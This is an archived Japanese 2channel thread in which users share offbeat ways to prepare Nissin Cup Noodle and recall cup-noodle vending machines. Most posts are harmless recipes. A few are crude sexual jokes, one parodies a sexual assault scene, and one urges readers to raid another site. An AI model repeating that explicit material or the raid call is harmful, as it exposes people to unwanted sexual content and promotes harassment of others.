2ちゃんねる スマホ用 ■掲示板に戻る■ 全部 1- 最新50    

日清カップヌードルを思いっ切り邪道に食べよう!

1 :埼玉の男 ◆VtwGA5eqlc :2005/03/28(月) 06:45:10 ID:???.net ?##
スレタイ通りです。
出来れば毎日御願いします。
では、ドゾー!

2 :すぐ名無し、すごく名無し:2005/03/28(月) 08:26:47 ID:5c8X2M4u.net
いきなり他人任せか?
ずいぶんな>>1だなおい

3 :すぐ名無し、すごく名無し:2005/03/28(月) 09:47:26 ID:ZfXGNI1Z.net
カップヌードルってオナヌー以外に使い道あんの?

4 :すぐ名無し、すごく名無し:2005/03/28(月) 13:19:50 ID:i7w1YLT/.net
お湯入れて二十分くらい放置
麺にスープがじゅっと沁みててうまい

5 :ラーメン大王:2005/03/28(月) 14:11:32 ID:sK+7yqeu.net
日清ってだけで邪道。
日清に振り回されるな。
自分が旨いと思ったカップラーメンを食え。

それが日清だったら鼻くそほじりながら認定してやる。

自分の舌を信じなさい。

6 :すぐ名無し、すごく名無し:2005/03/28(月) 14:25:57 ID:DAfqJywn.net
まず普通にお湯を入れて作る(お湯は少し少なめに)
次にもったいないが大さじ2杯分位残してスープを捨てる
フライパンにシーチキンの油を入れ、揚げ焼きっぽくする
食う直前に残しておいたスープを「ジューッ」ってかけて食べると(゚д゚)ウマー
いつも捨ててしまいがちなシーチキンの油も使えて一石二鳥

7 :すぐ名無し、すごく名無し:2005/03/28(月) 16:55:13 ID:30fhDZoM.net
普通に食いなよ...

8 ::2005/03/29(火) 13:17:34 ID:BvqXxMXq.net
シーフードにマヨ入れたらうまいよ星

9 :すぐ名無し、すごく名無し:2005/03/29(火) 13:36:21 ID:Jgst4kc6.net
カレーにお湯の代わりに暖めた牛乳を入れる
てか今食ってる

10 :すぐ名無し、すごく名無し:2005/03/29(火) 22:06:58 ID:kYZ2rBkK.net
半分くらい普通に食べて、
残りの麺をオムレツの具に。
出来たら、ご飯と残りのスープを供に〆


まんぷくぷー

11 :すぐ名無し、すごく名無し:2005/03/29(火) 22:44:10 ID:tiGHc10v.net
普通に作ってザルにあける(汁はお椀に)。
で、つけ麺として食うってやり方でガキの頃やったことあったな。
袋麺のつけ麺が新発売された時代に(’。’)。o O

12 :すぐ名無し、すごく名無し:2005/03/31(木) 04:46:55 ID:rC7mX1y4.net
麺喰ったらだめだよねー

13 :すぐ名無し、すごく名無し:皇紀2665/04/01(金) 01:11:30 ID:GEOiNR2W.net
邪道なんてほどのこたないが
いつもお湯入れて一分くらいで食ってるよ


14 :すぐ名無し、すごく名無し:皇紀2665/04/01(金) 01:21:59 ID:O/mpUX5t.net
俺シーフード湯入れないで食った
ウマー

15 :すぐ名無し、すごく名無し:皇紀2665/04/01(金) 02:25:01 ID:ibAJ7SgW.net
昔カップヌードル寿司とかいうのをマンガで見た記憶がある


16 :すぐ名無し、すごく名無し:皇紀2665/04/01(金) 16:33:42 ID:+X9Ln2zY.net
というか、フォークを使わないで食ってる時点で邪道なので、
消費者のほとんどが邪道。

17 :すぐ名無し、すごく名無し:皇紀2665/04/01(金) 17:57:18 ID:XKXwF/4l.net
カップヌードルは原宿や銀座を歩きながら食うのだ。
すごい昔の話だが、それがかっこよかったのだ。
今やって見ろ!
すごい恥ずかしいから。

さて本題に入ります。
カップヌードルをスープを飲まないようにして食し、のこったスープの中にポテトチップをてんこ盛り入れます。
何かでフタをして1分たつと、日清ポテトヌードルに!

18 :すぐ名無し、すごく名無し:皇紀2665/04/01(金) 18:27:01 ID:DW4rjkkn.net
>>17
それをいうなら、日清カップポテトでしょ。

19 :すぐ名無し、すごく名無し:皇紀2665/04/01(金) 20:03:22 ID:q+XoF3ly.net
ミニカップを食った後の容器を
車のカップホルダーに置いている

それでペットボトルからコーヒーを注ぐと
ウマー

20 :すぐ名無し、すごく名無し:皇紀2665/04/01(金) 20:08:22 ID:q+XoF3ly.net
黄色いポストのカップヌードルの自販機を知ってる香具師はこのスレには居まい

21 :すぐ名無し、すごく名無し:皇紀2665/04/01(金) 23:50:25 ID:/ftMpRaH.net
黄色いポスト?
よくわからんがカップめんの自販機なら二度見たことあるぞ



22 :すぐ名無し、すごく名無し:2005/04/04(月) 01:32:00 ID:+ekcKj8N.net
お湯入れる窓があるやつ?
最近見ないけど・・・

23 :すぐ名無し、すごく名無し:2005/04/04(月) 02:18:53 ID:tfQ0Kgv2.net
カップヌードルの自販機
フォークがないと悲しいよ

24 :すぐ名無し、すごく名無し:2005/04/04(月) 07:07:18 ID:YfmPGfC+.net
お湯が出てくるのはマルちゃんの
自販機だったきがする。
カップヌードルの黄色の自販機は
お湯も出ないし、箸やフォークが入ってる
ポケットも無かったと思う。

25 :すぐ名無し、すごく名無し:2005/04/04(月) 17:51:11 ID:o9pk4Ugq.net ?
大阪のスパワールドのプールに
カップヌードルの自販機があるぞ!

26 :すぐ名無し、すごく名無し:2005/04/04(月) 18:44:46 ID:9Jw/aYxj.net
       人 
       (__)    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     (..____)   < >1 糞スレ立てるな、蛆虫。氏ね。
___( ・∀・)__.\
\ \/    ヽ\  \  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   ̄| ̄| ̄ ̄∪ ̄| ̄ ̄
   |  |        |
   \.|____|

       パタン
     _ヾ__/__
     |\ヾ \  ×⌒
     |  | ̄ ̄ ̄ ̄|
     |  |        |
     .\|____|

27 :すぐ名無し、すごく名無し:2005/05/08(日) 04:30:58 ID:Jgj/QAKe.net
>>20
買ったカップのビニール剥いて中に置いてドア閉めてボタン押すと
お湯の注ぎ口が降りてきてフタに刺しちゃうヤツだろ?

28 :すぐ名無し、すごく名無し:2005/05/14(土) 13:32:18 ID:s4dWtel6.net
カレーのお湯を切って、温泉卵と粉チーズ入れてかき混ぜて食う。

29 :すぐ名無し、すごく名無し:2005/07/26(火) 00:35:53 ID:HAHZUHGy.net
>>6
まず多めにお湯を入れて作る。
食う直前に、もったいないが具を残して麺とスープを捨てる。
次にhttp://food6.2ch.net/salt/のスレッドにある、
あらゆるhogehogeをぶち込む。
食う−>吐く−>下痢する−>入院。

30 :すぐ名無し、すごく名無し:2005/09/24(土) 02:13:09 ID:0El6tu0c.net
カップヌードルの自販機 近場のフェリー乗り場にある
前に1度そこで食ったことあんだけどさ
夜中友達と遊んでて腹減ったから食おうと思って買った
お湯出るとこもちゃんとあんだよな〜


いつもなら割り箸があるとこ空でした・・・

買う前に割り箸確認しなきゃと教訓になりまつた。。。
結局コンビにでお湯かりて食しますたとさ
めでたしめでたし....

31 :すぐ名無し、すごく名無し:2005/09/24(土) 20:24:39 ID:NYr2xLEC.net
カレーヌードルの麺を取り出し粉々にして冷や飯と混ぜてカップに戻して
お湯(極力少な目がいい)を注ぐ。
3分経ったらオイスターソースを加えてがーっとかき混ぜて食す。

32 :なお:2005/09/26(月) 16:13:20 ID:/JrtO2Eu.net
オリジナル味に、お湯入れる前に生卵入れてお湯を注いで3分後食べる。
うまい!お湯は少なめがベスト。

33 :すぐ名無し、すごく名無し:2005/09/26(月) 17:18:37 ID:PxBFyQhK.net
ノーマル味にお湯半分と無塩のトマトジュースを沸かしたヤシで
つくるとイタリアーンになってウマーだぜ。

34 :すぐ名無し、すごく名無し:2005/09/26(月) 19:01:01 ID:XZU1lSDG.net
普通にカレールーを入れる。

35 :すぐ名無し、すごく名無し:2005/09/26(月) 21:27:52 ID:F99R3DEZ.net
ノーマル味にお湯半分と牛乳を沸かしたヤシに、
チューブのニンニク入れると
カルボナーラ風になってウマーだぜ。



36 :すぐ名無し、すごく名無し:2005/09/27(火) 16:33:44 ID:e7Q6EdKI.net
シーフードも牛乳300ccで作るとウマーだぜ。

37 :すぐ名無し、すごく名無し:2005/09/27(火) 19:31:15 ID:7M9Wq+KG.net
>>35
それやってみるわ

38 :すぐ名無し、すごく名無し:2005/09/28(水) 00:09:15 ID:WQH+z19+.net
ここ見れ
http://members.ytv.home.ne.jp/cupmen/


39 :すぐ名無し、すごく名無し:2005/09/28(水) 08:06:29 ID:n9azLFCp.net
↑すごいね、これ!

40 :すぐ名無し、すごく名無し:2005/10/08(土) 02:58:19 ID:hblvB4cG.net
>>17
俺は寒い冬に軽井沢で食べるのが当時の流行だと聞いたが?

41 :すぐ名無し、すごく名無し:2005/10/08(土) 08:44:54 ID:X4T6n1gA.net
>>40隊員ですか?

42 :すぐ名無し、すごく名無し:2005/10/23(日) 19:19:31 ID:9Dkc2nhR.net
>>14
シーフード味はお湯を入れないでそのまま食べると美味いね。
ただ、麺がカップに貼り付いてるから砕けにくいのが欠点。

43 :すぐ名無し、すごく名無し:2005/10/31(月) 17:06:58 ID:U8gTgGYA.net
>22

電車の駅に置いてるとこもあるよ!少なくとも二十年前から置いてあって、寒い日は待合所で食べる。滋賀県の信楽駅だけど…

44 :すぐ名無し、すごく名無し:2005/10/31(月) 19:45:57 ID:imcNN3JF.net
爽やかに マーボ豆腐をのっける 鮮やかな味でマイウです。

45 :すぐ名無し、すごく名無し:2005/10/31(月) 19:56:37 ID:7qjP1wq0.net
昆布と鰹節の二番だしを入れてみた。大して変わらん。

46 :すぐ名無し、すごく名無し:2005/10/31(月) 20:27:42 ID:Ke/V/TIw.net
豪華にビフテキを入れてみる。
ステーキじゃないよ。ビフテキ。


47 :すぐ名無し、すごく名無し:2005/10/31(月) 23:12:52 ID:8b42r3aM.net
カップヌードルの自販機なら後楽園ホールにあるが200円する

48 :すぐ名無し、すごく名無し:2005/11/01(火) 13:01:37 ID:OpjQX0WO.net
シーフードにタバスコを十滴くらい入れる。

49 :すぐ名無し、すごく名無し:2005/11/01(火) 14:14:28 ID:EizvC210.net
はわーはわはわはわはわはわわわわー

50 :すぐ名無し、すごく名無し:2005/11/01(火) 14:15:32 ID:EizvC210.net
ぱむぱむぽむん

51 :「神せんぐみ」より:2005/11/02(水) 07:21:30 ID:Z873GqbQ.net
味噌もおk〜よ!

52 :すぐ名無し、すごく名無し:2005/11/02(水) 08:41:24 ID:otQ1HeAL.net
塩分云々のテレビでなんだかの先生だか教授がシーフードを
お湯入れてから、半分捨ててまたお湯入れて喰ってたな。
これくらいで塩分はちょうど良いんですとか言ってた。
そこまでしてヌードル喰う必要も無かろうに…

53 :すぐ名無し、すごく名無し:2005/11/02(水) 10:04:14 ID:9w3Rltw/.net
犬や猫や鳩のエサにしてます

54 :すぐ名無し、すごく名無し:2005/11/02(水) 10:08:03 ID:9w3Rltw/.net
香港映画によく出てくるよね
日清製品は

55 :すぐ名無し、すごく名無し:2005/11/02(水) 10:17:39 ID:i/YVvxQ8.net
>>16
カップヌードルは昔は透明なフォークがついてた。復活キボン。
いまだに自分はカップヌードルだけはフォークで食べてる。
パッケージのお洒落さにはフォークが合う。当時の人のがセンス良かった。

56 :すぐ名無し、すごく名無し:2005/11/02(水) 14:36:13 ID:9w3Rltw/.net
うちの犬猫は箸やフォーク使えません


57 :すぐ名無し、すごく名無し:2005/11/08(火) 19:59:37 ID:7NXHZ1OI.net
キムチにサドンデスソース・・・

58 :もちage:2005/11/26(土) 04:56:45 ID:QllRomvs.net
味噌をコンビニでも置いて欲しい

59 :すぐ名無し、すごく名無し:2005/11/28(月) 07:38:18 ID:2UT5AHYY.net
寝惚けてチリトマトに水を入れ3分待ったが、意外に麺もほぐれてなかなかいけた。
けど、チンして食べました、ありがとうございました。

60 :すぐ名無し、すごく名無し:2005/12/06(火) 16:36:02 ID:dbbH1loq.net
ノーマル醤油にお湯を注ぎ30分程放置
その間お気に入りのエロ本を熟読
その後お湯の残りを捨てズボンを脱ぎ
勃○したmySUNをカップを床に置き垂直に挿入
何度も何度も腰を振りカップ内に大量発射
それを皿にあけマヨネーズと醤油をかけかき混ぜれば出来上がり
まじで激ウマ〜(・∀・)イイ


61 :すぐ名無し、すごく名無し:2005/12/06(火) 23:34:30 ID:FudXqHLq.net
できたらスープ全部コップに移して
生卵と醤油入れてかきまぜる

62 :すぐ名無し、すごく名無し:2005/12/07(水) 13:56:00 ID:nTcb6wHR.net
会社の給湯室でカップヌードルにお湯を注いだら、
「熱っ!」
底が割れてたらしく、お湯が漏れてる。指で押さえる訳にもいかず、
とりあえず、そこいらにあったコップで流れ出るお湯(スープ)を
受けた。すぐにコップは満タンになり、それ以上流れた汁はあきらめたが
さて、どうしよう。移しかえる容器などあるはずもなく、コップは汁が
満タンで、具材を入れる訳にもいかない。だんだん汁も具も冷めてくる。

そうだ、コンビニの袋があった。それに両方いれてまぜりゃ、どうにか
食えるだろう、と思ってやってみた。

ゲロみたいで気持ち悪かったので、そのままゴミ箱へ捨てた。
腹が立つので、その日の夜は激辛カレーライスを食った。

63 :すぐ名無し、すごく名無し:2005/12/08(木) 14:02:01 ID:neay2dhQ.net
>>62
ネタだろうがマジレスしてやる。
コップに残ったスープに麺をその都度つけて、つけ麺のようにして食えばよかったのに。

64 :すぐ名無し、すごく名無し:2006/01/01(日) 07:39:52 ID:uuML14dJ.net
あけおめ

65 :すぐ名無し、すごく名無し:2006/01/15(日) 11:31:50 ID:85I8S/NU.net
ほい、あけおめ。

シーフードイタリアン食べたけど、塩がきつかった…。
普通のシーフード+一味+無塩トマトジュースのほうが美味しかったな…(´・ω・`)

66 :すぐ名無し、すごく名無し:2006/01/15(日) 13:32:26 ID:q8jXq+xH.net
一昼夜かけてとった、鶏がらスープで作る

67 :すぐ名無し、すごく名無し:2006/01/15(日) 14:30:17 ID:GboUUfM7.net
肉とエビだけ食って捨てる

68 :すぐ名無し、すごく名無し:2006/01/23(月) 00:02:24 ID:sZYBt5f+.net
乾燥卵・エビって、そのままでも美味い。

69 :すぐ名無し、すごく名無し:2006/02/09(木) 16:02:45 ID:sSn8c6T3.net
頭からかぶる

70 :すぐ名無し、すごく名無し:2006/02/12(日) 17:23:58 ID:2bsoOczR.net
すり鉢で面を徹底的にすり潰し、粉になったやつをカップに戻し、お湯を入れて練って食う。

71 :すぐ名無し、すごく名無し:2006/02/12(日) 17:31:03 ID:w6EHBPMg.net
カレーヌードルに入ってるジャガイモをそのまま食うのは正道。

72 :すぐ名無し、すごく名無し:2006/02/12(日) 17:36:29 ID:0TLL1eU/.net
土鍋にあけて食ってます。地味ですがカップの存在を否定する邪道な行為。

73 :すぐ名無し、すごく名無し:2006/02/13(月) 02:29:14 ID:0KS1QP1I.net
三分間待ってる間
「キミはすてきだ、オレのものになってくれ」
などと口説いてから食う

74 :すぐ名無し、すごく名無し:2006/02/13(月) 23:31:17 ID:XdsUIoR0.net
シーフードイタリアンを食べる
→汁を大幅に残す(多少具も残すとよい)
→汁と少量の御飯を小鍋に入れてグツグツ煮込む
→洋風雑炊ウマーー

75 :すぐ名無し、すごく名無し:2006/02/13(月) 23:57:05 ID:OCbQoxpi.net
>>74
それはデブの基本メニューでごわす

76 :すぐ名無し、すごく名無し:2006/02/14(火) 01:02:45 ID:YqC/T+2e.net
ピザを注文→30分後にピザが来る→カップヌードルにお湯を入れる→ピザを喰う→ウマー

77 :すぐ名無し、すごく名無し:2006/02/16(木) 22:32:27 ID:bYVGl26f.net
シーフードに牛乳を入れるのは慨出?

78 :すぐ名無し、すごく名無し:2006/02/17(金) 03:21:20 ID:HZH2UK+f.net
>72
風流な人ですね

79 :すぐ名無し、すごく名無し:2006/02/17(金) 03:26:16 ID:GuRgY7jE.net
>>28
コーセーやんけ

80 :すぐ名無し、すごく名無し:2006/02/18(土) 20:50:59 ID:iC6+FjiD.net
シーフードにタバスコたっぷり入れるとトムヤム味でうまい

81 :すぐ名無し、すごく名無し:2006/02/19(日) 06:25:39 ID:RQOhzKoH.net
出前一丁のごまラー油投入
マジうまい

82 :エンジェル響:2006/02/19(日) 11:23:03 ID:W1HSKV5J.net
カップヌードルにお湯入れる。食べる。食べ終わったら焼いた餅を入れて雑煮風に食べる。

83 :エンジェル響:2006/02/19(日) 11:28:46 ID:W1HSKV5J.net
カップヌードルにお湯を入れる。スープだけどんぶりに移して、あらかじめ茹でておいた生麺をどんぶりに入れて食う。

84 :すぐ名無し、すごく名無し:2006/02/19(日) 15:48:37 ID:ryVpvEvY.net
寒い外で食うカップヌードルは旨い!
で、自販機で買ってお湯入れたあとで箸もフォークも無いのに気づいた
車の中探したらボールペンしかなかったから仕方なくそれ使って食べた
旨くなかった

85 :すぐ名無し、すごく名無し:2006/02/19(日) 16:08:04 ID:VZnYWAqs.net
>>84
ツーリング中の朝飯にカップ麺を食おうとして、箸が無いのに気付いて
ドライバー2本で食ったのを思い出したよ。工具の使い方としては邪道
だけど、カップヌードルの食い方としては思いっきり正道だよな。

86 :すぐ名無し、すごく名無し:2006/02/19(日) 16:25:40 ID:ryVpvEvY.net
>>85
ボールペンで食ってるとこ人に見られたくないから
コソコソしてたのと、なんかインクが染み出してこないか
心配で その精神的に

87 :すぐ名無し、すごく名無し:2006/02/19(日) 20:14:53 ID:bpVd56MR.net
普通のカップヌードルに熱湯入れて2分25秒くらいで食う。
んで、一口食ったら、胡椒とニンニク唐辛子ドバドバ入れて、醤油一回し入れて食う。
美味いよ!普通の一味に擦りおろしニンニクでも美味いよ!

88 :すぐ名無し、すごく名無し:2006/02/21(火) 05:00:04 ID:1f1CpKr6.net
>>87だけど、まるちゃん(東洋水産)緑の(天そば)たぬきに七味くそ入れて青海苔かなり入れても美味いぞ!スレ違いスマソ!

89 :すぐ名無し、すごく名無し:2006/02/21(火) 10:11:23 ID:GtiMQ6m0.net
友人情報だけど、醤油かシーフードに少な目にお湯いれて2分30秒たったらお好み焼きの具に混ぜて焼く!!

スープを粉混ぜる水代わりにするらしい

美味しいらしいよ


90 :すぐ名無し、すごく名無し:2006/02/22(水) 00:15:13 ID:YPZcHNon.net
カレーヌードルのお湯を一分で捨てて、半熟卵いれて 
粉チーズかけてグチャグチャにするとカレー味のカルボナーラの出来上がり。
漫画であった。 一度くってみたい

91 :すぐ名無し、すごく名無し:2006/02/28(火) 20:00:04 ID:n5sUBfPZ.net
カレーヌードルを両手で潰して麺を砕く。
生で食べると、つまみに最適。
濃厚に味わうなら、
砕いたら標準より2センチ位少なく湯を入れてドロドロにして掻きこむ。

92 :すぐ名無し、すごく名無し:2006/03/23(木) 17:59:23 ID:SxinLlUb.net
シーフードに調整乳でない牛乳+お湯でほぐしたじゃがりこチーズ

93 :すぐ名無し、すごく名無し:2006/03/27(月) 15:31:25 ID:bJQ+dPxp.net
これはまじなんだが
熱焼酎を入れて作るとんこつラーメンが
めちゃうま
焼酎を90度ぐらいまで燗つけて
それをカップめんに注いで作る
100度にしないのがコツ


94 :すぐ名無し、すごく名無し:2006/04/23(日) 02:10:08 ID:mfyiUd3u.net
水で作る。


95 :すぐ名無し、すごく名無し:2006/04/23(日) 02:49:14 ID:oh0Q1m0a.net
コーラ

96 :すぐ名無し、すごく名無し:2006/04/23(日) 04:57:57 ID:ruVWefu0.net
ふやけて汁捨てたところに
突っ込んでシコシコした後
食え!

97 :すぐ名無し、すごく名無し:2006/04/23(日) 09:55:58 ID:Nh3R8HaN.net
汁捨ててウスターソースまぜてパンにはさんで食う

98 :すぐ名無し、すごく名無し:2006/04/23(日) 10:59:34 ID:EtKP303p.net
生卵を入れてからお湯を注ぐ

99 :すぐ名無し、すごく名無し:2006/04/23(日) 11:15:37 ID:K7DFDl3u.net
そうだな

100 :すぐ名無し、すごく名無し:2006/04/24(月) 00:01:03 ID:iOq8wwJT.net
昔ボンボンでやってた漫画オーマイコンブでカップヌードルで寿司作ってたのを見た

101 :すぐ名無し、すごく名無し:2006/04/25(火) 20:11:48 ID:9WVLwcLt.net
誰かがやかんで澗してた日本酒をいれた

102 :すぐ名無し、すごく名無し:2006/04/28(金) 12:15:29 ID:4OAMvTnP.net
きつねどんべと同じ食い方で、お湯を入れてから10分以上待つ。

今再チャレンジ中で今回は具を全部貯めているからさ、ちょっと寂しいけど
充分ふやかせば具無しでも結構イケるよ。



103 :すぐ名無し、すごく名無し:2006/04/29(土) 06:24:20 ID:VMXHst7C.net
麺を皿に取って納豆まぜまぜ。

104 :すぐ名無し、すごく名無し:2006/04/29(土) 12:35:18 ID:5n8v3kgW.net
猫はカプヌードルよりきつねどんべえが好き
やっぱり10分おいたほうがおいしいよね

105 :すぐ名無し、すごく名無し:2006/05/17(水) 22:29:48 ID:33NfAdn7.net
>>17
ハンバーガーとかならまだしもカップ麺喰いながら歩くのは難しいってか危ないよな

106 :すぐ名無し、すごく名無し:2006/06/06(火) 15:45:39 ID:nlM0Damu.net
納豆入れて食うと旨いよな。
納豆キライな人はアレだけど

107 :すぐ名無し、すごく名無し:2006/06/06(火) 17:22:57 ID:rvbse826.net
http://www.thecount3.com
暇つぶしにお笑いをどうぞ
食べながらどうぞ〜

108 :すぐ名無し、すごく名無し:2006/06/07(水) 17:23:34 ID:aQrElXxT.net
食べながら見てみます

109 :すぐ名無し、すごく名無し:2006/06/08(木) 00:27:59 ID:0AdolrLd.net
>>107
コント1本見て待ってたら麺がのびちゃった

110 :すぐ名無し、すごく名無し:2006/06/08(木) 12:53:41 ID:3xwuL6hT.net
時間的には待つにも食うにもびみょうなじかんだ

111 :すぐ名無し、すごく名無し:2006/06/11(日) 08:02:44 ID:daVT4+kv.net
コント1本だといいぐらいじゃない?

112 :すぐ名無し、すごく名無し:2006/06/11(日) 19:12:52 ID:fOB+OSKO.net
湯を入れてから蓋をして目の前に置く
手を胸の前で組み目を瞑る。
「天にまします我等の神よ…(約7分)…アーメン。」
膨張しきった汁なし麺を食う。


113 :すぐ名無し、すごく名無し:2006/06/12(月) 11:47:40 ID:I9lDJXcD.net
既レス見て何か興味がありシーフード、沸かした牛乳で今食ってるとこ…
いつもは一つじゃ足りないのに半分くらいでお腹いっぱい…
って言うか気持ち悪くなってきた…

もしかしてこのレシピって…
お湯で食ったほうが(ry


114 :すぐ名無し、すごく名無し:2006/06/12(月) 12:00:13 ID:I9lDJXcD.net
追記
今麺捨てた…
スープだけだと結構美味い!

でも正直のとこ、このスープとこのヌードルのセッションは
絶妙この上ない気持ち悪さ…
これが美味いと言える人はポタージュ系のスープに
パスタならまだしも中華麺やそうめん入れても
美味しいと言って食べられる人。

115 :すぐ名無し、すごく名無し:2006/06/12(月) 12:05:13 ID:I9lDJXcD.net
セッションというかコラボだったかな…
当分シーフードヌードル食べるのやめよ…

連投失礼。。

116 :すぐ名無し、すごく名無し:2006/06/12(月) 19:42:05 ID:wRcVDqy2.net
>>107
コント2本見て待ってたらスープがなくなった

117 :すぐ名無し、すごく名無し:2006/06/14(水) 14:32:49 ID:oYz69NfQ.net
2本は長いよ

118 :すぐ名無し、すごく名無し:2006/06/16(金) 03:28:30 ID:6PjlGMBE.net
見ながら食べるとうまい

119 :すぐ名無し、すごく名無し:2006/06/16(金) 04:03:22 ID:wGj4HrRO.net
桃屋キムチの元

120 :すぐ名無し、すごく名無し:2006/06/16(金) 08:38:01 ID:FVIQXFWr.net
>>100
激しく亀だが、kwsk

121 :すぐ名無し、すごく名無し:2006/06/18(日) 00:45:59 ID:Z/B5WPaE.net
「や…やめてください…」
「へへへ……ラップはもうビリビリだぜ、あとはフタだけだ」
「いやぁ! だめ、フタを開けないで…!」
「ひゃっはあ! なんて嫌らしいノンフライ麺だ!」
「おいおい、スープの素が2袋もあるぜぇ、こいつ誘ってんじゃねえのか?」
「そ、そんなんじゃありません…!」
「『食べる直前に入れてください』だぁ? 待ちきれねえ、今すぐ入れてやるぜ!」
「や、やめてー! ま、まだお湯も沸ききってないのに…!」
「うはぁ、すっげえ、冷えてる油とかやくでグチャグチャだぜ…たまんねえ!」
「そーれ、お次はお湯だ! 中にたっぷり入れてやる!」
「あああ! ぬ、ぬるい…! ……て、れてえ!」
「聞こえねえなあ、はっきりいえよオラッ!」
「せ、線まで! きちんと線まで入れてくださいぃいぃ!!」

(省略されました 続きを読むには3分間待ってください)


122 :すぐ名無し、すごく名無し:2006/06/18(日) 01:44:09 ID:Ogxf7k/G.net
>>107
はーい

123 :すぐ名無し、すごく名無し:2006/06/18(日) 10:14:51 ID:7+Sv/7Jp.net
アンガールズが、トマトジュース入れだの食べててうまそうだった。
さっそくトマトジュース買ってきた俺。

124 :すぐ名無し、すごく名無し:2006/06/18(日) 10:19:53 ID:hAKqF0El.net
具だけ生で食べる
それだけ

125 :すぐ名無し、すごく名無し:2006/06/20(火) 07:48:40 ID:RHiqZ6wl.net
欧風チーズカレーに、チーズをこれでもかってくらい
入れるのがうまい。
普通のカレーヌードルに入れてもうまくない。

126 :すぐ名無し、すごく名無し:2006/06/20(火) 09:12:07 ID:QQt4k4sx.net
カップスターと容器を取り替えて食べる

127 :すぐ名無し、すごく名無し:2006/06/20(火) 17:15:01 ID:fyVw8lw2.net
>>107
見たらラーメンがうま

128 :すぐ名無し、すごく名無し:2006/06/21(水) 05:03:20 ID:w9KzzMjR.net
>>125
欧米か

129 :すぐ名無し、すごく名無し:2006/06/22(木) 21:59:51 ID:EXIQDPi4.net
ナンプラー

130 :すぐ名無し、すごく名無し:2006/06/22(木) 22:56:22 ID:dJo2clme.net
>>120 >>100ではないが、
カプヌー作る→出来たら笊でスープと麺、具を分ける(スープはとっておく)
麺と具を巻き寿司の具にする→スープにつけて喰う
(゚д゚)ウマー
らしい。やってみてくれ。

131 :すぐ名無し、すごく名無し:2006/06/23(金) 01:44:42 ID:6KGZ1dVe.net
お湯そそぐ
スープ捨てる
オナ道具に使う
食べる

132 :すぐ名無し、すごく名無し:2006/06/23(金) 16:43:57 ID:5/n6QBiD.net
>>107
お笑いいいね。

133 :すぐ名無し、すごく名無し:2006/06/25(日) 02:32:14 ID:5SboZqnp.net
http://tv8.2ch.net/test/read.cgi/cm/1150992809/
外で食うと旨いんだよ!

134 :すぐ名無し、すごく名無し:2006/06/27(火) 02:24:42 ID:xwxFaGmN.net
>>107
ラーメンコント見てー

135 :すぐ名無し、すごく名無し:2006/06/27(火) 14:15:15 ID:hvCmjQxD.net
レギュラーのカップヌードルにコーンポタージュスープの素を入れる(袋半分くらい)。
あとは普通にお湯入れて食す。
ウマー


136 :すぐ名無し、すごく名無し:2006/06/27(火) 16:45:56 ID:8JqyFmO7.net
出来たものをスープは別の器に捨てておいて、具と麺が
ほどよく冷めたら細かめに切る。
フライパンで炒めて卵2〜3個でオムレツ(作るのが苦手
ならスクランブルエッグ風でも可)
残ったスープは少量のご飯を入れてリゾット風に。
オムレツやリゾットには緑黄色野菜を少し加えたいところ。

137 :すぐ名無し、すごく名無し:2006/06/28(水) 14:28:49 ID:MtO3v0L4.net
昨日の深夜番組で見たのだが、
「牛乳で作るとウマー」
という投書にアンガの田中が、色々と挑戦してた。
一番は意外に緑茶だた。次点がトマトジュース。
ココア、オレンジジュース、ワイン、焼酎などは不味いらしい。
今度試してみよう。皆、続け。

138 :すぐ名無し、すごく名無し:2006/06/29(木) 03:45:52 ID:xgPyPhxM.net
雪山に行く

軽く遭難する
  ↓
寒いやばいもう死ぬ
  ↓
偶然にも山小屋が!よしあそこに避難だ
  ↓
そこで唯一持ってきたカップヌードルを
キンキンに冷やして食う

139 :すぐ名無し、すごく名無し:2006/06/29(木) 19:27:44 ID:RbP73xpg.net
>>107
動画いいねー

140 :すぐ名無し、すごく名無し:2006/07/04(火) 16:52:04 ID:MfGF2iuU.net
お笑いってどうやって作ってるんだろ?

141 :すぐ名無し、すごく名無し:2006/07/05(水) 11:32:56 ID:Wa3u6TAj.net
沖縄には何でカップヌードル売ってないの?
コンビニ、スーパー探しても金ちゃんヌードルしかなかった

俺の食い方は、蓋開けて上にのってる海老、卵、肉等をゴミ箱に捨てる
カップラーメンにお湯を入れて3分待つ
麺だけ食って残ったスープを2口位すすって残りは捨てる。


142 :すぐ名無し、すごく名無し:2006/07/05(水) 12:22:13 ID:mDNuF5MK.net
>>141
いや、逆に、沖縄で売ってないことを初めて知った。

143 :すぐ名無し、すごく名無し:2006/07/05(水) 15:17:02 ID:Wa3u6TAj.net
今は分からないけど4年前は沖縄にカップヌードル無かったよ。
沖縄南部中部と石垣島しか行ってないけど。
沖縄の人は、東京に来て金ちゃんヌードルが無いのに驚いてた。



144 :すぐ名無し、すごく名無し:2006/07/08(土) 23:28:48 ID:jGQE3KK8.net
シーフード、もう10年くらい牛乳でしか食べてない

沸かした牛乳とお湯を9:1くらいにするとウマい
コツは最初に牛乳を入れ、具のところはお湯(かき混ぜない)
3分じゃまだ麺が固い、10分は置く(固い麺が好きなら3分でも)
出来たらかき混ぜて食べる、クラムチャウダーに平麺が入ってる感じ

145 :すぐ名無し、すごく名無し:2006/07/13(木) 02:24:18 ID:CC8zxxXr.net
トヨエツが生卵入れて食べてたけどうまいのかね?

146 :すぐ名無し、すごく名無し:2006/07/16(日) 17:48:15 ID:BkoailvK.net
シーフードヌードルのスープだけいっぱい飲みたい

147 :すぐ名無し、すごく名無し:2006/07/17(月) 11:54:11 ID:RikM4Sl3.net
彩香に捧げつつ 食べる (合掌)

148 :すぐ名無し、すごく名無し:2006/07/17(月) 13:28:20 ID:Mlrbsu4B.net
なんか辛いな。

149 :すぐ名無し、すごく名無し:2006/07/21(金) 01:54:59 ID:HUrIloi+.net
みんな、ここに書き込め。
突撃!!!

http://www.geocities.jp/atsdesuyonn/

150 :すぐ名無し、すごく名無し:2006/07/21(金) 03:33:49 ID:JtL17Aii.net
>>107
おもしれー

151 :すぐ名無し、すごく名無し:2006/07/21(金) 07:02:59 ID:2RMnCm14.net
>>113-115
>>144
どうなんだ実際…試してみたいが…シーフードが嫌いになったら鬱…

152 :すぐ名無し、すごく名無し:2006/07/23(日) 16:52:04 ID:wxaFFD9e.net
著者は忘れたが、丸一冊、お湯の代わりに色んなもん入れてカップラーメン作ったレポート本あったぞ。

